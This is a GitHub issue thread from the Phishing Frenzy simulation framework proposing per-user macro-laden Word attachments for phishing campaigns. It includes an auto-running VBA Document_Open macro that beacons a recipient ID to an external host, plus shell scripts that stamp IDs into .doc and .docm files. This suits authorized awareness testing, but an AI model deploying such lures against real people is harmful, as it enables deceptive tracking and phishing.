phishing-frenzy icon indicating copy to clipboard operation
phishing-frenzy copied to clipboard

Published 20 hours ago verified publisher icon pentestgeek

Manage Office document with macro

Open fraf0 opened this issue 8 years ago • 2 comments

Hi,

I would like to be able to send Office document (word, excel) with macro in an simulated phishing campaign. To be able to follow the user action, the macro must include the user ID.

If I do it "by hand", I'll do like this :

  • Create a word document with the macro, including "_usrid" at the user id place.
  • Manipulate the document to replace _usrid by the true one
    • With 97-2003 file type : Just replace the string in binary mode
    • With 2007+ file type : Uncompress the file, modify the content and regenerate an office file
  • Attach the good file to each email (by user id)

In Phishing Frenzy framework, I see two ways :

  • Generate the document outside the framework and reference the attachemnt by the userid or
  • Be able to manipulate the office document directly into the framework, based on a template

Technical details :

VBA Macro :

Private Sub Document_Open()
    Dim HttpReq As Object
    Set HttpReq = CreateObject("MSXML2.XMLHTTP")
    HttpReq.Open "GET", "http://requestb.in/xvdaudxv?usrid=__usrid_", False
    HttpReq.send
    XmlHttpRequest = HttpReq.responseText
    MsgBox HttpReq.responseText + Str(HttpReq.Status)
End Sub
  • 97-2003 file type
for i in AFWTTLFQ JCJGQZVF
  do
    sed -e "s/__usrid_/${i}/" Coucou.doc > Coucou_${i}.doc
  done
  • 2007+ file type
for i in AFWTTLFQ JCJGQZVF
  do
    mkdir ${i}
    cd ${i}
    7z x ../Coucou.docm
    sed -i -e "s/__usrid_/${i}/" word/vbaProject.bin
    zip -r ../Coucou_${i}.docm *
    cd ..
    rm -rf ${i}
  done

The zip manipulation tranform the Office document into OOXML file according file :

file Coucou*
  Coucou_AFWTTLFQ.docm: Microsoft OOXML
  Coucou.docm:          Microsoft Word 2007+
  Coucou_JCJGQZVF.docm: Microsoft OOXML

But Word open if without any problem.

Regards, fraf

fraf0 avatar Sep 26 '16 14:09 fraf0

Hi, @fraf0 is this just an idea or it works actually?

RatedRR avatar Apr 11 '17 14:04 RatedRR

Hi, It works but not integrated into Phishing Frenzy. In addition with my first post, you must deal with unicode with for example:

usrid_uni=$(echo -n ${usrid} | sed -e 's/(.)/\x00\1/g') sed -i -e "s/usrid_________________________________/${usrid}/g" "by_usrid/${usrid}/doc.doc" sed -i -e "s/\x00_\x00u\x00s\x00r\x00i\x00d\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_/${usrid_uni}/g" "by_usrid/${usrid}/doc.doc"`

It should be even better to use iconv -t unicodebig instead of sed to generate the unicode format :)

fraf0 avatar Apr 21 '17 10:04 fraf0